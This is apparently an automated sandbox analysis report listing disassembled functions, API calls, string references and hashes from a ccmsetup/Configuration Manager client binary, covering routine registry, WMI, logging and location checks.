                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmFile.cpp$..\CcmFile.cpp$..\CcmFile.cpp$..\CcmFile.cpp$CCM::Utility::Filesystem::Directory::Exists$filePath.assign(szDir)$szDir != 0
                                                                                          • API String ID: 2353050750-2227103289
                                                                                          • Opcode ID: 99a2b7e368a3dabcd7a6efb08f76e7c3b8fc6c53a7396ff7a8b7f4b6fad81f23
                                                                                          • Instruction ID: e8803334f746b4337ede4252659de05bca6e4b83eecfb8e6045105d07eae750b
                                                                                          • Opcode Fuzzy Hash: 99a2b7e368a3dabcd7a6efb08f76e7c3b8fc6c53a7396ff7a8b7f4b6fad81f23
                                                                                          • Instruction Fuzzy Hash: 293114719C5344EADB24E7B4CD0ABEF7F65AF21700F188059F5867B2C2C7645A08CB66
                                                                                          Function 0064376C Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 250COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00643776
                                                                                            • Part of subcall function 0062552C: __EH_prolog3_catch.LIBCMT ref: 00625533
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Workgroup client is in Intranet, xrefs: 00643A4E
                                                                                          • CCM::LocationServices::LSGetClientLocation, xrefs: 00643795
                                                                                          • %s client is in Internet, xrefs: 00643A86
                                                                                          • Domain joined, xrefs: 00643985, 006439C2, 00643A85, 00643AAD
                                                                                          • Domain joined client is in Intranet, xrefs: 006439FF
                                                                                          • Domain joined client is in Internet, xrefs: 00643923
                                                                                          • Client may be in Internet without any network connection, xrefs: 0064387B
                                                                                          • %s client is in Unknown location, xrefs: 00643AAE
                                                                                          • Workgroup, xrefs: 0064398A
                                                                                          • %s client is in Intranet, xrefs: 006439C3
                                                                                          • CCM Client is marked as always on the internet, client location is CCM_CLIENTLOCATION_INTERNET, xrefs: 006437FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchH_prolog3_catch_Thread
                                                                                          • String ID: %s client is in Internet$%s client is in Intranet$%s client is in Unknown location$CCM Client is marked as always on the internet, client location is CCM_CLIENTLOCATION_INTERNET$CCM::LocationServices::LSGetClientLocation$Client may be in Internet without any network connection$Domain joined$Domain joined client is in Internet$Domain joined client is in Intranet$Workgroup$Workgroup client is in Intranet
                                                                                          • API String ID: 1198108500-712495269
                                                                                          • Opcode ID: e571d457dc7b2bc84c23ab6a2f4111fb64290830fd1e68632853603718e8046f
                                                                                          • Instruction ID: 299320978c4ac93693a44dae1d55dcbe0a20a026a721cce16ceae93b6263c41c
                                                                                          • Opcode Fuzzy Hash: e571d457dc7b2bc84c23ab6a2f4111fb64290830fd1e68632853603718e8046f
                                                                                          • Instruction Fuzzy Hash: C391D2B1D443A8AEDF20DBA48849BEDBFB5BF11304F144059E554AB382D7B44A89CF11
                                                                                          Function 0061F862 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 106threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0061F869
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061F8CE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061F92B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CloseH_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$0 != szRegEntryName$0 != szRegKey$CcmUtilLib::ReadRegistryEntryStr
                                                                                          • API String ID: 3375736234-35468896
                                                                                          • Opcode ID: 9cd0730f9e15c42366688f323ffbb49b5f2d40387d95051a7e02cbf38b37d652
                                                                                          • Instruction ID: 08379f2d0fb27ccb4855cd34a3540d8cc3870df658173bd2e997cc96408a9489
                                                                                          • Opcode Fuzzy Hash: 9cd0730f9e15c42366688f323ffbb49b5f2d40387d95051a7e02cbf38b37d652
                                                                                          • Instruction Fuzzy Hash: 2431EF71980359FADB11EBA4D80ABEDBA71AF50B14F184155F9417B3C2C7B80E46D391
                                                                                          Function 0060C143 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 96threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060C14A
                                                                                            • Part of subcall function 006093A0: __EH_prolog3.LIBCMT ref: 006093A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060C1A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060C213
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::Object::GetString$Get(pszName, &vValue, VT_BSTR)$pszName != 0
                                                                                          • API String ID: 981364226-2030028387
                                                                                          • Opcode ID: 5e47b1e459a7fa5c349a988f73d6fd4c7d162a15c5dc3101e91913307ebdb452
                                                                                          • Instruction ID: 9a0547d9b63539772aacbb4e543f75c16f1fc0c98c5b3e3c4483f632d42c5265
                                                                                          • Opcode Fuzzy Hash: 5e47b1e459a7fa5c349a988f73d6fd4c7d162a15c5dc3101e91913307ebdb452
                                                                                          • Instruction Fuzzy Hash: EC31F6709C1309AEDB19EBA0C91BBEE7E62AF51B20F144149B905673C3CBB40F09C7A1
                                                                                          Function 0060BC69 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 92threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060BC70
                                                                                            • Part of subcall function 006093A0: __EH_prolog3.LIBCMT ref: 006093A7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060BCCC
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060BD34
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$..\WmiObject.cpp$CCM::Utility::Wmi::Object::GetDword$Get(pszName, vValue, VT_UI4)$pszName != 0
                                                                                          • API String ID: 981364226-1784177122
                                                                                          • Opcode ID: 4cce67f208b0100c0641b3301e3b4354708c769ef2630f8529e702fe61f31c45
                                                                                          • Instruction ID: 5fbd7739ea6b44716e9d44910e7fa161de718e830baa242208a6e0b6479b43b6
                                                                                          • Opcode Fuzzy Hash: 4cce67f208b0100c0641b3301e3b4354708c769ef2630f8529e702fe61f31c45
                                                                                          • Instruction Fuzzy Hash: 633107709C0244EADB29EBA0C95ABEF7E62AF51721F149059F8006B3C2CBF50F09C795
                                                                                          Function 0061F559 Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 90threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0061F560
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061F5BB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0061F61A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CloseH_prolog3H_prolog3_catch
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$..\CcmUtilLib.cpp$0 != szRegEntryName$0 != szRegKey$CcmUtilLib::ReadRegistryEntryDWORD
                                                                                          • API String ID: 921656330-1582721282
                                                                                          • Opcode ID: 00f7254292da3e3f35345da9e4be3725379c48bee169f554f2d5f58fe1eb74b3
                                                                                          • Instruction ID: f076df805076a5755e32d5b00119ee7c506a9dac1b709367e2c5c8c84dbb435e
                                                                                          • Opcode Fuzzy Hash: 00f7254292da3e3f35345da9e4be3725379c48bee169f554f2d5f58fe1eb74b3
                                                                                          • Instruction Fuzzy Hash: 2A31E67198134AEADF10EFA0991ABED7E626F61B14F184055F5007B2C2CAB94F45C7E2
                                                                                          Function 00635296 Relevance: 17.7, APIs: 2, Strings: 8, Instructions: 153timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0063529D
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F094C: __EH_prolog3_catch_GS.LIBCMT ref: 005F0956
                                                                                            • Part of subcall function 005F094C: GetCurrentThreadId.KERNEL32 ref: 005F09AC
                                                                                          • GetSystemTime.KERNEL32(?,CCM::FspUtilLib::CFSPStateMessage::CFSPStateMessage,?,FSPStateMessage,00000000,?,00000018,00000005,Function_0008419F,00578034,0000003C,005CA20D,00000174,005C9F01,?,?), ref: 006353DC
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catchH_prolog3_catch_SystemTime
                                                                                          • String ID: CCM::FspUtilLib::CFSPStateMessage::CFSPStateMessage$CFSPStateMessage::CFSPStateMessage$FSPStateMessage$HostName$HttpAlternatePort$HttpPort$IntranetHostName$Software\Microsoft\CCM\FSP
                                                                                          • API String ID: 555624483-106147692
                                                                                          • Opcode ID: d635a8ad640149cbbf93fbc8218962321fa70ef4bc091b19d15f3c0fdf933a28
                                                                                          • Instruction ID: 93a4317c8f79bbf1a69705ca809ce5e06b9ed7a9fa3ef77413ba2c33d1834278
                                                                                          • Opcode Fuzzy Hash: d635a8ad640149cbbf93fbc8218962321fa70ef4bc091b19d15f3c0fdf933a28
                                                                                          • Instruction Fuzzy Hash: 55510070801749EADB14EFA4C94ABEEBFB5BF10304F50445DE186A72C2DBB82A48CB51
                                                                                          Function 00593C13 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 129threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00593C4A
                                                                                          • LocalFree.KERNEL32(00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001,00000000,00000001), ref: 005953D8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentFreeLocalThread
                                                                                          • String ID: %s was passed an invalid value. Verify the value is numeric and greater than zero.$%s, HRESULT=%08lx (%s,%lu)$/retry:$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$sValue.empty() == false$Fl
                                                                                          • API String ID: 3276020833-2753467663
                                                                                          • Opcode ID: ca89faeed54aa5448cae3c6cbee4f8832c7dcdfc5469c0d5e2e1c7ef684bddec
                                                                                          • Instruction ID: 2d3e2e639f7f64ca13f34c524d84636bbcc004d10b7489ffce23a561b6937c18
                                                                                          • Opcode Fuzzy Hash: ca89faeed54aa5448cae3c6cbee4f8832c7dcdfc5469c0d5e2e1c7ef684bddec
                                                                                          • Instruction Fuzzy Hash: DF51CE30A84358EAEF25EBA0CD5EBEDBB60AB51704F6044DAF5057A1C2DBB41F44CB51
                                                                                          Function 0057DADA Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 62threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0057DAE1
                                                                                          • GetFileAttributesW.KERNEL32(?,?,?,?,?,CcmSetup::CreateDownloadDirectory,00000010), ref: 0057DB18
                                                                                          • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,?,?,CcmSetup::CreateDownloadDirectory,00000010), ref: 0057DB2E
                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,?,?,?,CcmSetup::CreateDownloadDirectory,00000010), ref: 0057DB38
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057DB6E
                                                                                          Strings
                                                                                          • CcmSetup::CreateDownloadDirectory, xrefs: 0057DAED
                                                                                          • ccmsetup.cpp, xrefs: 0057DB76
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057DB69
                                                                                          • ccmsetup.cpp, xrefs: 0057DB5E
                                                                                          • CreateDirectoryW( m_sDownloadDir, 0 ), xrefs: 0057DB64
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: AttributesCreateCurrentDirectoryErrorFileH_prolog3_catchLastThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CcmSetup::CreateDownloadDirectory$CreateDirectoryW( m_sDownloadDir, 0 )$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 1311896448-140672756
                                                                                          • Opcode ID: 8c47e5306de3168c0eae0dbf88953003fcbbff197c064d3dee019307d91e113b
                                                                                          • Instruction ID: 4bc82eb5e08a738788084e08fb64d32f39f0c5f83bf071fc64a30658d0aff42b
                                                                                          • Opcode Fuzzy Hash: 8c47e5306de3168c0eae0dbf88953003fcbbff197c064d3dee019307d91e113b
                                                                                          • Instruction Fuzzy Hash: 4B110331A4034197D720ABB89C49B9E7EF6BF81721F0A8119F548972C1CA254D04AAB1
                                                                                          Function 00593269 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 138threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005932A0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$Invalid argument: %s$No valid source or MP locations$ccmsetup.cpp$ccmsetup.cpp$iPos > 0$Fl
                                                                                          • API String ID: 2882836952-3542515626
                                                                                          • Opcode ID: d7c655b3dd78a05e9b74983cba5d423b30afddb6445f0eb22b0d5daac0ea7ea5
                                                                                          • Instruction ID: 112b4d9f3ea5c8364863efd80cc98dbbd272259b4a94183a6f2922c561055aaf
                                                                                          • Opcode Fuzzy Hash: d7c655b3dd78a05e9b74983cba5d423b30afddb6445f0eb22b0d5daac0ea7ea5
                                                                                          • Instruction Fuzzy Hash: DA519A30A44358EAEF25DBA4CD1ABDDBBB4AB51704F5044C9E6447B1C2DBB41F88CB92
                                                                                          Function 005F2666 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 135threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F266D
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F0651: __EH_prolog3_catch.LIBCMT ref: 005F0658
                                                                                            • Part of subcall function 005F0651: __CxxThrowException@8.LIBCMT ref: 005F06C5
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 005F6706: RegCloseKey.ADVAPI32(00000000,?,005F7287,CCM::Utility::RegKey::Open,00000018,005FAEB5,80000002,00000000,00000000,00000000,00000000,000000FF,CCM::Utility::GetCcmDirectory,0000001C,005F9BFF,?), ref: 005F6714
                                                                                            • Part of subcall function 005F7229: RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,CCM::Utility::RegKey::Open,00000018,005FAEB5,80000002,00000000,00000000,00000000,00000000,000000FF,CCM::Utility::GetCcmDirectory,0000001C), ref: 005F72CF
                                                                                            • Part of subcall function 005F7229: RegOpenKeyExW.KERNEL32(00000000,00000000,00000000,00000300,00000000,00000000), ref: 005F733B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F274A
                                                                                          Strings
                                                                                          • Failed to refresh logging config for component '%s' (0x%08x), xrefs: 005F27CD
                                                                                          • ..\Logging.cpp, xrefs: 005F2752
                                                                                          • Software\Microsoft\CCM\Logging\DebugLogging, xrefs: 005F26B7
                                                                                          • ..\Logging.cpp, xrefs: 005F273A
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F2745
                                                                                          • g_LogHandlerInfo.pResetConfigProc(), xrefs: 005F2740
                                                                                          • Software\Microsoft\CCM\Logging\TAFLogging, xrefs: 005F26E9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CloseOpen$CurrentException@8H_prolog3ThreadThrow
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\Logging.cpp$..\Logging.cpp$Failed to refresh logging config for component '%s' (0x%08x)$Software\Microsoft\CCM\Logging\DebugLogging$Software\Microsoft\CCM\Logging\TAFLogging$g_LogHandlerInfo.pResetConfigProc()
                                                                                          • API String ID: 3651561300-727670264
                                                                                          • Opcode ID: 0de2d4076dba5c17fc9cebe0b0d470f7670641a1d8f2af811ffdc1a13717df17
                                                                                          • Instruction ID: 107fe942eb606e65e2c7301c22ce09ce2f8f61095726bb6745cdf0cfab7f7950
                                                                                          • Opcode Fuzzy Hash: 0de2d4076dba5c17fc9cebe0b0d470f7670641a1d8f2af811ffdc1a13717df17
